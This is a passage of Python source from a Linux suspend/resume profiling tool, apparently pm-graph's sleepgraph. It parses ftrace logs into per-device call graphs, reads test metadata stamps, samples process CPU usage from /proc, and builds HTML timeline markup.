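# this line, and -1 means it completed only after depth corrections (partial).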
class FTraceCallGraph:
vfname = 'missing_function_name'
def __init__(self, pid, sv):
self.id = ''
self.invalid = False
self.name = ''
self.partial = False
self.ignore = False
self.start = -1.0
self.end = -1.0
self.list = []
self.depth = 0
self.pid = pid
self.sv = sv
def addLine(self, line):
# if this is already invalid, just leave
if(self.invalid):
if(line.depth == 0 and line.freturn):
return 1
return 0
# invalidate on bad depth
if(self.depth < 0):
self.invalidate(line)
return 0
# ignore data til we return to the current depth
if self.ignore:
if line.depth > self.depth:
return 0
else:
self.list[-1].freturn = True
self.list[-1].length = line.time - self.list[-1].time
self.ignore = False
# if this is a return at self.depth, no more work is needed
if line.depth == self.depth and line.isReturn():
if line.depth == 0:
self.end = line.time
return 1
return 0
# compare current depth with this lines pre-call depth
prelinedep = line.depth
if line.isReturn():
prelinedep += 1
last = 0
lasttime = line.time
if len(self.list) > 0:
last = self.list[-1]
lasttime = last.time
if last.isLeaf():
lasttime += last.length
# handle low misalignments by inserting returns
mismatch = prelinedep - self.depth
warning = self.sv.verbose and abs(mismatch) > 1
info = []
if mismatch < 0:
idx = 0
# add return calls to get the depth down
while prelinedep < self.depth:
self.depth -= 1
if idx == 0 and last and last.isCall():
# special case, turn last call into a leaf
last.depth = self.depth
last.freturn = True
last.length = line.time - last.time
if warning:
info.append(('[make leaf]', last))
else:
vline = FTraceLine(lasttime)
vline.depth = self.depth
vline.name = self.vfname
vline.freturn = True
self.list.append(vline)
if warning:
if idx == 0:
info.append(('', last))
info.append(('[add return]', vline))
idx += 1
if warning:
info.append(('', line))
# handle high misalignments by inserting calls
elif mismatch > 0:
idx = 0
if warning:
info.append(('', last))
# add calls to get the depth up
while prelinedep > self.depth:
if idx == 0 and line.isReturn():
# special case, turn this return into a leaf
line.fcall = True
prelinedep -= 1
if warning:
info.append(('[make leaf]', line))
else:
vline = FTraceLine(lasttime)
vline.depth = self.depth
vline.name = self.vfname
vline.fcall = True
self.list.append(vline)
self.depth += 1
if not last:
self.start = vline.time
if warning:
info.append(('[add call]', vline))
idx += 1
if warning and ('[make leaf]', line) not in info:
info.append(('', line))
if warning:
pprint('WARNING: ftrace data missing, corrections made:')
for i in info:
t, obj = i
if obj:
obj.debugPrint(t)
# process the call and set the new depth
skipadd = False
md = self.sv.max_graph_depth
if line.isCall():
# ignore blacklisted/overdepth funcs
if (md and self.depth >= md - 1) or (line.name in self.sv.cgblacklist):
self.ignore = True
else:
self.depth += 1
elif line.isReturn():
self.depth -= 1
# remove blacklisted/overdepth/empty funcs that slipped through
if (last and last.isCall() and last.depth == line.depth) or \
(md and last and last.depth >= md) or \
(line.name in self.sv.cgblacklist):
while len(self.list) > 0 and self.list[-1].depth > line.depth:
self.list.pop(-1)
if len(self.list) == 0:
self.invalid = True
return 1
self.list[-1].freturn = True
self.list[-1].length = line.time - self.list[-1].time
self.list[-1].name = line.name
skipadd = True
if len(self.list) < 1:
self.start = line.time
# check for a mismatch that returned all the way to callgraph end
res = 1
if mismatch < 0 and self.list[-1].depth == 0 and self.list[-1].freturn:
line = self.list[-1]
skipadd = True
res = -1
if not skipadd:
self.list.append(line)
if(line.depth == 0 and line.freturn):
if(self.start < 0):
self.start = line.time
self.end = line.time
if line.fcall:
self.end += line.length
if self.list[0].name == self.vfname:
self.invalid = True
if res == -1:
self.partial = True
return res
return 0
def invalidate(self, line):
if(len(self.list) > 0):
first = self.list[0]
self.list = []
self.list.append(first)
self.invalid = True
id = 'task %s' % (self.pid)
window = '(%f - %f)' % (self.start, line.time)
if(self.depth < 0):
pprint('Data misalignment for '+id+\
' (buffer overflow), ignoring this callback')
else:
pprint('Too much data for '+id+\
' '+window+', ignoring this callback')
def slice(self, dev):
minicg = FTraceCallGraph(dev['pid'], self.sv)
minicg.name = self.name
mydepth = -1
good = False
for l in self.list:
if(l.time < dev['start'] or l.time > dev['end']):
continue
if mydepth < 0:
if l.name == 'mutex_lock' and l.freturn:
mydepth = l.depth
continue
elif l.depth == mydepth and l.name == 'mutex_unlock' and l.fcall:
good = True
break
l.depth -= mydepth
minicg.addLine(l)
if not good or len(minicg.list) < 1:
return 0
return minicg
def repair(self, enddepth):
# bring the depth back to 0 with additional returns
fixed = False
last = self.list[-1]
for i in reversed(range(enddepth)):
t = FTraceLine(last.time)
t.depth = i
t.freturn = True
fixed = self.addLine(t)
if fixed != 0:
self.end = last.time
return True
return False
def postProcess(self):
if len(self.list) > 0:
self.name = self.list[0].name
stack = dict()
cnt = 0
last = 0
for l in self.list:
# ftrace bug: reported duration is not reliable
# check each leaf and clip it at max possible length
if last and last.isLeaf():
if last.length > l.time - last.time:
last.length = l.time - last.time
if l.isCall():
stack[l.depth] = l
cnt += 1
elif l.isReturn():
if(l.depth not in stack):
if self.sv.verbose:
pprint('Post Process Error: Depth missing')
l.debugPrint()
return False
# calculate call length from call/return lines
cl = stack[l.depth]
cl.length = l.time - cl.time
if cl.name == self.vfname:
cl.name = l.name
stack.pop(l.depth)
l.length = 0
cnt -= 1
last = l
if(cnt == 0):
# trace caught the whole call tree
return True
elif(cnt < 0):
if self.sv.verbose:
pprint('Post Process Error: Depth is less than 0')
return False
# trace ended before call tree finished
return self.repair(cnt)
def deviceMatch(self, pid, data):
found = ''
# add the callgraph data to the device hierarchy
borderphase = {
'dpm_prepare': 'suspend_prepare',
'dpm_complete': 'resume_complete'
}
if(self.name in borderphase):
p = borderphase[self.name]
list = data.dmesg[p]['list']
for devname in list:
dev = list[devname]
if(pid == dev['pid'] and
self.start <= dev['start'] and
self.end >= dev['end']):
cg = self.slice(dev)
if cg:
dev['ftrace'] = cg
found = devname
return found
for p in data.sortedPhases():
if(data.dmesg[p]['start'] <= self.start and
self.start <= data.dmesg[p]['end']):
list = data.dmesg[p]['list']
for devname in sorted(list, key=lambda k:list[k]['start']):
dev = list[devname]
if(pid == dev['pid'] and
self.start <= dev['start'] and
self.end >= dev['end']):
dev['ftrace'] = self
found = devname
break
break
return found
def newActionFromFunction(self, data):
name = self.name
if name in ['dpm_run_callback', 'dpm_prepare', 'dpm_complete']:
return
fs = self.start
fe = self.end
if fs < data.start or fe > data.end:
return
phase = ''
for p in data.sortedPhases():
if(data.dmesg[p]['start'] <= self.start and
self.start < data.dmesg[p]['end']):
phase = p
break
if not phase:
return
out = data.newActionGlobal(name, fs, fe, -2)
if out:
phase, myname = out
data.dmesg[phase]['list'][myname]['ftrace'] = self
def debugPrint(self, info=''):
pprint('%s pid=%d [%f - %f] %.3f us' % \
(self.name, self.pid, self.start, self.end,
(self.end - self.start)*1000000))
for l in self.list:
if l.isLeaf():
pprint('%f (%02d): %s(); (%.3f us)%s' % (l.time, \
l.depth, l.name, l.length*1000000, info))
elif l.freturn:
pprint('%f (%02d): %s} (%.3f us)%s' % (l.time, \
l.depth, l.name, l.length*1000000, info))
else:
pprint('%f (%02d): %s() { (%.3f us)%s' % (l.time, \
l.depth, l.name, l.length*1000000, info))
pprint(' ')
class DevItem:
def __init__(self, test, phase, dev):
self.test = test
self.phase = phase
self.dev = dev
def isa(self, cls):
if 'htmlclass' in self.dev and cls in self.dev['htmlclass']:
return True
return False
# Class: Timeline
# Description:
# A container for a device timeline which calculates
# all the html properties to display it correctly
class Timeline:
html_tblock = '<div id="block{0}" class="tblock" style="left:{1}%;width:{2}%;"><div class="tback" style="height:{3}px"></div>\n'
html_device = '<div id="{0}" title="{1}" class="thread{7}" style="left:{2}%;top:{3}px;height:{4}px;width:{5}%;{8}">{6}</div>\n'
html_phase = '<div class="phase" style="left:{0}%;width:{1}%;top:{2}px;height:{3}px;background:{4}">{5}</div>\n'
html_phaselet = '<div id="{0}" class="phaselet" style="left:{1}%;width:{2}%;background:{3}"></div>\n'
html_legend = '<div id="p{3}" class="square" style="left:{0}%;background:{1}"> {2}</div>\n'
def __init__(self, rowheight, scaleheight):
self.html = ''
self.height = 0 # total timeline height
self.scaleH = scaleheight # timescale (top) row height
self.rowH = rowheight # device row height
self.bodyH = 0 # body height
self.rows = 0 # total timeline rows
self.rowlines = dict()
self.rowheight = dict()
def createHeader(self, sv, stamp):
if(not stamp['time']):
return
self.html += '<div class="version"><a href="https://01.org/pm-graph">%s v%s</a></div>' \
% (sv.title, sv.version)
if sv.logmsg and sv.testlog:
self.html += '<button id="showtest" class="logbtn btnfmt">log</button>'
if sv.dmesglog:
self.html += '<button id="showdmesg" class="logbtn btnfmt">dmesg</button>'
if sv.ftracelog:
self.html += '<button id="showftrace" class="logbtn btnfmt">ftrace</button>'
headline_stamp = '<div class="stamp">{0} {1} {2} {3}</div>\n'
self.html += headline_stamp.format(stamp['host'], stamp['kernel'],
stamp['mode'], stamp['time'])
if 'man' in stamp and 'plat' in stamp and 'cpu' in stamp and \
stamp['man'] and stamp['plat'] and stamp['cpu']:
headline_sysinfo = '<div class="stamp sysinfo">{0} {1} <i>with</i> {2}</div>\n'
self.html += headline_sysinfo.format(stamp['man'], stamp['plat'], stamp['cpu'])
# Function: getDeviceRows
# Description:
#	 determine how many rows the device funcs will take
# Arguments:
# rawlist: the list of devices/actions for a single phase
# Output:
# The total number of rows needed to display this phase of the timeline
def getDeviceRows(self, rawlist):
# clear all rows and set them to undefined
sortdict = dict()
for item in rawlist:
item.row = -1
sortdict[item] = item.length
sortlist = sorted(sortdict, key=sortdict.get, reverse=True)
remaining = len(sortlist)
rowdata = dict()
row = 1
# try to pack each row with as many ranges as possible
while(remaining > 0):
if(row not in rowdata):
rowdata[row] = []
for i in sortlist:
if(i.row >= 0):
continue
s = i.time
e = i.time + i.length
valid = True
for ritem in rowdata[row]:
rs = ritem.time
re = ritem.time + ritem.length
if(not (((s <= rs) and (e <= rs)) or
((s >= re) and (e >= re)))):
valid = False
break
if(valid):
rowdata[row].append(i)
i.row = row
remaining -= 1
row += 1
return row
# Function: getPhaseRows
# Description:
# Organize the timeline entries into the smallest
# number of rows possible, with no entry overlapping
# Arguments:
# devlist: the list of devices/actions in a group of contiguous phases
# Output:
# The total number of rows needed to display this phase of the timeline
def getPhaseRows(self, devlist, row=0, sortby='length'):
# clear all rows and set them to undefined
remaining = len(devlist)
rowdata = dict()
sortdict = dict()
myphases = []
# initialize all device rows to -1 and calculate devrows
for item in devlist:
dev = item.dev
tp = (item.test, item.phase)
if tp not in myphases:
myphases.append(tp)
dev['row'] = -1
if sortby == 'start':
# sort by start 1st, then length 2nd
sortdict[item] = (-1*float(dev['start']), float(dev['end']) - float(dev['start']))
else:
# sort by length 1st, then name 2nd
sortdict[item] = (float(dev['end']) - float(dev['start']), item.dev['name'])
if 'src' in dev:
dev['devrows'] = self.getDeviceRows(dev['src'])
# sort the devlist by length so that large items graph on top
sortlist = sorted(sortdict, key=sortdict.get, reverse=True)
orderedlist = []
for item in sortlist:
if item.dev['pid'] == -2:
orderedlist.append(item)
for item in sortlist:
if item not in orderedlist:
orderedlist.append(item)
# try to pack each row with as many devices as possible
while(remaining > 0):
rowheight = 1
if(row not in rowdata):
rowdata[row] = []
for item in orderedlist:
dev = item.dev
if(dev['row'] < 0):
s = dev['start']
e = dev['end']
valid = True
for ritem in rowdata[row]:
rs = ritem.dev['start']
re = ritem.dev['end']
if(not (((s <= rs) and (e <= rs)) or
((s >= re) and (e >= re)))):
valid = False
break
if(valid):
rowdata[row].append(item)
dev['row'] = row
remaining -= 1
if 'devrows' in dev and dev['devrows'] > rowheight:
rowheight = dev['devrows']
for t, p in myphases:
if t not in self.rowlines or t not in self.rowheight:
self.rowlines[t] = dict()
self.rowheight[t] = dict()
if p not in self.rowlines[t] or p not in self.rowheight[t]:
self.rowlines[t][p] = dict()
self.rowheight[t][p] = dict()
rh = self.rowH
# section headers should use a different row height
if len(rowdata[row]) == 1 and \
'htmlclass' in rowdata[row][0].dev and \
'sec' in rowdata[row][0].dev['htmlclass']:
rh = 15
self.rowlines[t][p][row] = rowheight
self.rowheight[t][p][row] = rowheight * rh
row += 1
if(row > self.rows):
self.rows = int(row)
return row
def phaseRowHeight(self, test, phase, row):
return self.rowheight[test][phase][row]
def phaseRowTop(self, test, phase, row):
top = 0
for i in sorted(self.rowheight[test][phase]):
if i >= row:
break
top += self.rowheight[test][phase][i]
return top
def calcTotalRows(self):
# Calculate the heights and offsets for the header and rows
maxrows = 0
standardphases = []
for t in self.rowlines:
for p in self.rowlines[t]:
total = 0
for i in sorted(self.rowlines[t][p]):
total += self.rowlines[t][p][i]
if total > maxrows:
maxrows = total
if total == len(self.rowlines[t][p]):
standardphases.append((t, p))
self.height = self.scaleH + (maxrows*self.rowH)
self.bodyH = self.height - self.scaleH
# if there is 1 line per row, draw them the standard way
for t, p in standardphases:
for i in sorted(self.rowheight[t][p]):
self.rowheight[t][p][i] = float(self.bodyH)/len(self.rowlines[t][p])
def createZoomBox(self, mode='command', testcount=1):
# Create bounding box, add buttons
html_zoombox = '<center><button id="zoomin">ZOOM IN +</button><button id="zoomout">ZOOM OUT -</button><button id="zoomdef">ZOOM 1:1</button></center>\n'
html_timeline = '<div id="dmesgzoombox" class="zoombox">\n<div id="{0}" class="timeline" style="height:{1}px">\n'
html_devlist1 = '<button id="devlist1" class="devlist" style="float:left;">Device Detail{0}</button>'
html_devlist2 = '<button id="devlist2" class="devlist" style="float:right;">Device Detail2</button>\n'
if mode != 'command':
if testcount > 1:
self.html += html_devlist2
self.html += html_devlist1.format('1')
else:
self.html += html_devlist1.format('')
self.html += html_zoombox
self.html += html_timeline.format('dmesg', self.height)
# Function: createTimeScale
# Description:
# Create the timescale for a timeline block
# Arguments:
# m0: start time (mode begin)
# mMax: end time (mode end)
# tTotal: total timeline time
# mode: suspend or resume
# Output:
# The html code needed to display the time scale
def createTimeScale(self, m0, mMax, tTotal, mode):
timescale = '<div class="t" style="right:{0}%">{1}</div>\n'
rline = '<div class="t" style="left:0;border-left:1px solid black;border-right:0;">{0}</div>\n'
output = '<div class="timescale">\n'
# set scale for timeline
mTotal = mMax - m0
tS = 0.1
if(tTotal <= 0):
return output+'</div>\n'
if(tTotal > 4):
tS = 1
divTotal = int(mTotal/tS) + 1
divEdge = (mTotal - tS*(divTotal-1))*100/mTotal
for i in range(divTotal):
htmlline = ''
if(mode == 'suspend'):
pos = '%0.3f' % (100 - ((float(i)*tS*100)/mTotal) - divEdge)
val = '%0.fms' % (float(i-divTotal+1)*tS*1000)
if(i == divTotal - 1):
val = mode
htmlline = timescale.format(pos, val)
else:
pos = '%0.3f' % (100 - ((float(i)*tS*100)/mTotal))
val = '%0.fms' % (float(i)*tS*1000)
htmlline = timescale.format(pos, val)
if(i == 0):
htmlline = rline.format(mode)
output += htmlline
self.html += output+'</div>\n'
# Class: TestProps
# Description:
# A list of values describing the properties of these test runs
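# A hypothetical stamp line in the format stampfmt expects (mode prefix,
# MMDDYY-HHMMSS, hostname, suspend mode, kernel version):
#   # suspend-011524-103045 testhost mem 6.5.0-rc1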
class TestProps:
stampfmt = '# [a-z]*-(?P<m>[0-9]{2})(?P<d>[0-9]{2})(?P<y>[0-9]{2})-'+\
'(?P<H>[0-9]{2})(?P<M>[0-9]{2})(?P<S>[0-9]{2})'+\
' (?P<host>.*) (?P<mode>.*) (?P<kernel>.*)$'
wififmt = '^# wifi *(?P<d>\S*) *(?P<s>\S*) *(?P<t>[0-9\.]+).*'
tstatfmt = '^# turbostat (?P<t>\S*)'
testerrfmt = '^# enter_sleep_error (?P<e>.*)'
sysinfofmt = '^# sysinfo .*'
cmdlinefmt = '^# command \| (?P<cmd>.*)'
kparamsfmt = '^# kparams \| (?P<kp>.*)'
devpropfmt = '# Device Properties: .*'
pinfofmt = '# platform-(?P<val>[a-z,A-Z,0-9]*): (?P<info>.*)'
tracertypefmt = '# tracer: (?P<t>.*)'
firmwarefmt = '# fwsuspend (?P<s>[0-9]*) fwresume (?P<r>[0-9]*)$'
procexecfmt = 'ps - (?P<ps>.*)$'
ftrace_line_fmt_fg = \
'^ *(?P<time>[0-9\.]*) *\| *(?P<cpu>[0-9]*)\)'+\
' *(?P<proc>.*)-(?P<pid>[0-9]*) *\|'+\
'[ +!#\*@$]*(?P<dur>[0-9\.]*) .*\| (?P<msg>.*)'
ftrace_line_fmt_nop = \
' *(?P<proc>.*)-(?P<pid>[0-9]*) *\[(?P<cpu>[0-9]*)\] *'+\
'(?P<flags>\S*) *(?P<time>[0-9\.]*): *'+\
'(?P<msg>.*)'
machinesuspend = 'machine_suspend\[.*'
def __init__(self):
self.stamp = ''
self.sysinfo = ''
self.cmdline = ''
self.testerror = []
self.turbostat = []
self.wifi = []
self.fwdata = []
self.ftrace_line_fmt = self.ftrace_line_fmt_nop
self.cgformat = False
self.data = 0
self.ktemp = dict()
def setTracerType(self, tracer):
if(tracer == 'function_graph'):
self.cgformat = True
self.ftrace_line_fmt = self.ftrace_line_fmt_fg
elif(tracer == 'nop'):
self.ftrace_line_fmt = self.ftrace_line_fmt_nop
else:
doError('Invalid tracer format: [%s]' % tracer)
def stampInfo(self, line, sv):
if re.match(self.stampfmt, line):
self.stamp = line
return True
elif re.match(self.sysinfofmt, line):
self.sysinfo = line
return True
elif re.match(self.tstatfmt, line):
self.turbostat.append(line)
return True
elif re.match(self.wififmt, line):
self.wifi.append(line)
return True
elif re.match(self.testerrfmt, line):
self.testerror.append(line)
return True
elif re.match(self.firmwarefmt, line):
self.fwdata.append(line)
return True
elif(re.match(self.devpropfmt, line)):
self.parseDevprops(line, sv)
return True
elif(re.match(self.pinfofmt, line)):
self.parsePlatformInfo(line, sv)
return True
m = re.match(self.cmdlinefmt, line)
if m:
self.cmdline = m.group('cmd')
return True
m = re.match(self.tracertypefmt, line)
if(m):
self.setTracerType(m.group('t'))
return True
return False
def parseStamp(self, data, sv):
# global test data
m = re.match(self.stampfmt, self.stamp)
if not self.stamp or not m:
doError('data does not include the expected stamp')
data.stamp = {'time': '', 'host': '', 'mode': ''}
dt = datetime(int(m.group('y'))+2000, int(m.group('m')),
int(m.group('d')), int(m.group('H')), int(m.group('M')),
int(m.group('S')))
data.stamp['time'] = dt.strftime('%B %d %Y, %I:%M:%S %p')
data.stamp['host'] = m.group('host')
data.stamp['mode'] = m.group('mode')
data.stamp['kernel'] = m.group('kernel')
if re.match(self.sysinfofmt, self.sysinfo):
for f in self.sysinfo.split('|'):
if '#' in f:
continue
tmp = f.strip().split(':', 1)
key = tmp[0]
val = tmp[1]
data.stamp[key] = val
sv.hostname = data.stamp['host']
sv.suspendmode = data.stamp['mode']
if sv.suspendmode == 'freeze':
self.machinesuspend = 'timekeeping_freeze\[.*'
else:
self.machinesuspend = 'machine_suspend\[.*'
if sv.suspendmode == 'command' and sv.ftracefile != '':
modes = ['on', 'freeze', 'standby', 'mem', 'disk']
fp = sv.openlog(sv.ftracefile, 'r')
for line in fp:
m = re.match('.* machine_suspend\[(?P<mode>.*)\]', line)
if m and m.group('mode') in ['1', '2', '3', '4']:
sv.suspendmode = modes[int(m.group('mode'))]
data.stamp['mode'] = sv.suspendmode
break
fp.close()
sv.cmdline = self.cmdline
if not sv.stamp:
sv.stamp = data.stamp
# firmware data
if sv.suspendmode == 'mem' and len(self.fwdata) > data.testnumber:
m = re.match(self.firmwarefmt, self.fwdata[data.testnumber])
if m:
data.fwSuspend, data.fwResume = int(m.group('s')), int(m.group('r'))
if(data.fwSuspend > 0 or data.fwResume > 0):
data.fwValid = True
# turbostat data
if len(self.turbostat) > data.testnumber:
m = re.match(self.tstatfmt, self.turbostat[data.testnumber])
if m:
data.turbostat = m.group('t')
# wifi data
if len(self.wifi) > data.testnumber:
m = re.match(self.wififmt, self.wifi[data.testnumber])
if m:
data.wifi = {'dev': m.group('d'), 'stat': m.group('s'),
'time': float(m.group('t'))}
data.stamp['wifi'] = m.group('d')
# sleep mode enter errors
if len(self.testerror) > data.testnumber:
m = re.match(self.testerrfmt, self.testerror[data.testnumber])
if m:
data.enterfail = m.group('e')
def devprops(self, data):
props = dict()
devlist = data.split(';')
for dev in devlist:
f = dev.split(',')
if len(f) < 3:
continue
dev = f[0]
props[dev] = DevProps()
props[dev].altname = f[1]
if int(f[2]):
props[dev].isasync = True
else:
props[dev].isasync = False
return props
def parseDevprops(self, line, sv):
idx = line.index(': ') + 2
if idx >= len(line):
return
props = self.devprops(line[idx:])
if sv.suspendmode == 'command' and 'testcommandstring' in props:
sv.testcommand = props['testcommandstring'].altname
sv.devprops = props
def parsePlatformInfo(self, line, sv):
m = re.match(self.pinfofmt, line)
if not m:
return
name, info = m.group('val'), m.group('info')
if name == 'devinfo':
sv.devprops = self.devprops(sv.b64unzip(info))
return
elif name == 'testcmd':
sv.testcommand = info
return
field = info.split('|')
if len(field) < 2:
return
cmdline = field[0].strip()
output = sv.b64unzip(field[1].strip())
sv.platinfo.append([name, cmdline, output])
# Class: TestRun
# Description:
# A container for a suspend/resume test run. This is necessary as
# there could be more than one, and they need to be separate.
class TestRun:
def __init__(self, dataobj):
self.data = dataobj
self.ftemp = dict()
self.ttemp = dict()
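# Class: ProcessMonitor
# Description:
#	 Samples /proc/[pid]/stat from a background thread and writes the
#	 per-process cpu usage (in jiffies) to the trace_marker, so process
#	 activity can be drawn alongside the device timeline.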
class ProcessMonitor:
def __init__(self):
self.proclist = dict()
self.running = False
def procstat(self):
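		# snapshot /proc/[pid]/stat and report which processes used cpu
		# time (in jiffies) since the previous snapshot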
c = ['cat /proc/[1-9]*/stat 2>/dev/null']
process = Popen(c, shell=True, stdout=PIPE)
running = dict()
for line in process.stdout:
data = ascii(line).split()
pid = data[0]
name = re.sub('[()]', '', data[1])
user = int(data[13])
kern = int(data[14])
kjiff = ujiff = 0
if pid not in self.proclist:
self.proclist[pid] = {'name' : name, 'user' : user, 'kern' : kern}
else:
val = self.proclist[pid]
ujiff = user - val['user']
kjiff = kern - val['kern']
val['user'] = user
val['kern'] = kern
if ujiff > 0 or kjiff > 0:
running[pid] = ujiff + kjiff
process.wait()
out = ''
for pid in running:
jiffies = running[pid]
val = self.proclist[pid]
if out:
out += ','
out += '%s-%s %d' % (val['name'], pid, jiffies)
return 'ps - '+out
def processMonitor(self, tid):
while self.running:
out = self.procstat()
if out:
sysvals.fsetVal(out, 'trace_marker')
def start(self):
self.thread = Thread(target=self.processMonitor, args=(0,))
self.running = True
self.thread.start()
def stop(self):
self.running = False
# ----------------- FUNCTIONS --------------------
# Function: doesTraceLogHaveTraceEvents
# Description:
# Quickly determine if the ftrace log has all of the trace events,
# markers, and/or kprobes required for primary parsing.
def doesTraceLogHaveTraceEvents():
kpcheck = ['_cal: (', '_ret: (']
techeck = ['suspend_resume', 'device_pm_callback']
tmcheck = ['SUSPEND START', 'RESUME COMPLETE']
sysvals.usekprobes = False
fp = sysvals.openlog(sysvals.ftracefile, 'r')
for line in fp:
# check for kprobes
if not sysvals.usekprobes:
for i in kpcheck:
if i in line:
sysvals.usekprobes = True
# check for all necessary trace events
check = techeck[:]
for i in techeck:
if i in line:
check.remove(i)
techeck = check
# check for all necessary trace markers
check = tmcheck[:]
for i in tmcheck:
if i in line:
check.remove(i)
tmcheck = check
fp.close()
	sysvals.usetraceevents = len(techeck) < 2
	sysvals.usetracemarkers = len(tmcheck) == 0
# Function: appendIncompleteTraceLog
# Description:
#	 [deprecated for kernel 3.15.0 or newer]
#	 Adds callgraph data to a timeline when the ftrace log lacks trace
#	 event data. This is only for timelines generated from kernels
#	 older than 3.15.0
# Arguments:
# testruns: the array of Data objects obtained from parseKernelLog
def appendIncompleteTraceLog(testruns):
# create TestRun vessels for ftrace parsing
testcnt = len(testruns)
testidx = 0
testrun = []
for data in testruns:
testrun.append(TestRun(data))
# extract the callgraph and traceevent data
sysvals.vprint('Analyzing the ftrace data (%s)...' % \
os.path.basename(sysvals.ftracefile))
tp = TestProps()
tf = sysvals.openlog(sysvals.ftracefile, 'r')
data = 0
for line in tf:
# remove any latent carriage returns
line = line.replace('\r\n', '')
if tp.stampInfo(line, sysvals):
continue
# parse only valid lines, if this is not one move on
m = re.match(tp.ftrace_line_fmt, line)
if(not m):
continue
# gather the basic message data from the line
m_time = m.group('time')
m_pid = m.group('pid')
m_msg = m.group('msg')
if(tp.cgformat):
m_param3 = m.group('dur')
else:
m_param3 = 'traceevent'
if(m_time and m_pid and m_msg):
t = FTraceLine(m_time, m_msg, m_param3)
pid = int(m_pid)
else:
continue
# the line should be a call, return, or event
if(not t.fcall and not t.freturn and not t.fevent):
continue
# look for the suspend start marker
if(t.startMarker()):
data = testrun[testidx].data
tp.parseStamp(data, sysvals)
data.setStart(t.time, t.name)
continue
if(not data):
continue
# find the end of resume
if(t.endMarker()):
data.setEnd(t.time, t.name)
testidx += 1
if(testidx >= testcnt):
break
continue
# trace event processing
if(t.fevent):
continue
# call/return processing
elif sysvals.usecallgraph:
# create a callgraph object for the data
if(pid not in testrun[testidx].ftemp):
testrun[testidx].ftemp[pid] = []
testrun[testidx].ftemp[pid].append(FTraceCallGraph(pid, sysvals))
# when the call is finished, see which device matches it
cg = testrun[testidx].ftemp[pid][-1]
res = cg.addLine(t)
if(res != 0):
testrun[testidx].ftemp[pid].append(FTraceCallGraph(pid, sysvals))
if(res == -1):
testrun[testidx].ftemp[pid][-1].addLine(t)
tf.close()
for test in testrun:
# add the callgraph data to the device hierarchy
for pid in test.ftemp:
for cg in test.ftemp[pid]:
if len(cg.list) < 1 or cg.invalid or (cg.end - cg.start == 0):
continue
if(not cg.postProcess()):
id = 'task %s cpu %s' % (pid, m.group('cpu'))
sysvals.vprint('Sanity check failed for '+\
id+', ignoring this callback')
continue
callstart = cg.start
callend = cg.end
for p in test.data.sortedPhases():
if(test.data.dmesg[p]['start'] <= callstart and
callstart <= test.data.dmesg[p]['end']):
list = test.data.dmesg[p]['list']
for devname in list:
dev = list[devname]
if(pid == dev['pid'] and
callstart <= dev['start'] and
callend >= dev['end']):
dev['ftrace'] = cg
break
# Function: parseTraceLog
# Description:
# Analyze an ftrace log output file generated from this app during
# the execution phase. Used when the ftrace log is the primary data source
# and includes the suspend_resume and device_pm_callback trace events
# The ftrace filename is taken from sysvals
# Output:
# An array of Data objects
def parseTraceLog(live=False):
sysvals.vprint('Analyzing the ftrace data (%s)...' % \
os.path.basename(sysvals.ftracefile))
if(os.path.exists(sysvals.ftracefile) == False):
doError('%s does not exist' % sysvals.ftracefile)
if not live:
sysvals.setupAllKprobes()
ksuscalls = ['ksys_sync', 'pm_prepare_console']
krescalls = ['pm_restore_console']
tracewatch = ['irq_wakeup']
if sysvals.usekprobes:
tracewatch += ['sync_filesystems', 'freeze_processes', 'syscore_suspend',
'syscore_resume', 'resume_console', 'thaw_processes', 'CPU_ON',
'CPU_OFF', 'acpi_suspend']
# extract the callgraph and traceevent data
s2idle_enter = hwsus = False
tp = TestProps()
testruns, testdata = [], []
testrun, data, limbo = 0, 0, True
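	# data is the Data object of the active test; limbo is True whenever no
	# test is in progress (before a start marker or after an end marker)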
tf = sysvals.openlog(sysvals.ftracefile, 'r')
phase = 'suspend_prepare'
for line in tf:
# remove any latent carriage returns
line = line.replace('\r\n', '')
if tp.stampInfo(line, sysvals):
continue
# ignore all other commented lines
if line[0] == '#':
continue
# ftrace line: parse only valid lines
m = re.match(tp.ftrace_line_fmt, line)
if(not m):
continue
# gather the basic message data from the line
m_time = m.group('time')
m_proc = m.group('proc')
m_pid = m.group('pid')
m_msg = m.group('msg')
if(tp.cgformat):
m_param3 = m.group('dur')
else:
m_param3 = 'traceevent'
if(m_time and m_pid and m_msg):
t = FTraceLine(m_time, m_msg, m_param3)
pid = int(m_pid)
else:
continue
# the line should be a call, return, or event
if(not t.fcall and not t.freturn and not t.fevent):
continue
# find the start of suspend
if(t.startMarker()):
data, limbo = Data(len(testdata)), False
testdata.append(data)
testrun = TestRun(data)
testruns.append(testrun)
tp.parseStamp(data, sysvals)
data.setStart(t.time, t.name)
data.first_suspend_prepare = True
phase = data.setPhase('suspend_prepare', t.time, True)
continue
if(not data or limbo):
continue
# process cpu exec line
if t.type == 'tracing_mark_write':
m = re.match(tp.procexecfmt, t.name)
if(m):
proclist = dict()
for ps in m.group('ps').split(','):
val = ps.split()
if not val:
continue
name = val[0].replace('--', '-')
proclist[name] = int(val[1])
data.pstl[t.time] = proclist
continue
# find the end of resume
if(t.endMarker()):
if data.tKernRes == 0:
data.tKernRes = t.time
data.handleEndMarker(t.time, t.name)
if(not sysvals.usetracemarkers):
# no trace markers? then quit and be sure to finish recording
# the event we used to trigger resume end
if('thaw_processes' in testrun.ttemp and len(testrun.ttemp['thaw_processes']) > 0):
# if an entry exists, assume this is its end
testrun.ttemp['thaw_processes'][-1]['end'] = t.time
limbo = True
continue
# trace event processing
if(t.fevent):
if(t.type == 'suspend_resume'):
# suspend_resume trace events have two types, begin and end
if(re.match('(?P<name>.*) begin$', t.name)):
isbegin = True
elif(re.match('(?P<name>.*) end$', t.name)):
isbegin = False
else:
continue
if '[' in t.name:
m = re.match('(?P<name>.*)\[.*', t.name)
else:
m = re.match('(?P<name>.*) .*', t.name)
name = m.group('name')
# ignore these events
if(name.split('[')[0] in tracewatch):
continue
# -- phase changes --
# start of kernel suspend
if(re.match('suspend_enter\[.*', t.name)):
if(isbegin and data.tKernSus == 0):
data.tKernSus = t.time
continue
# suspend_prepare start
elif(re.match('dpm_prepare\[.*', t.name)):
if isbegin and data.first_suspend_prepare:
data.first_suspend_prepare = False
if data.tKernSus == 0:
data.tKernSus = t.time
continue
phase = data.setPhase('suspend_prepare', t.time, isbegin)
continue
# suspend start
elif(re.match('dpm_suspend\[.*', t.name)):
phase = data.setPhase('suspend', t.time, isbegin)
continue
# suspend_late start
elif(re.match('dpm_suspend_late\[.*', t.name)):
phase = data.setPhase('suspend_late', t.time, isbegin)
continue
# suspend_noirq start
elif(re.match('dpm_suspend_noirq\[.*', t.name)):
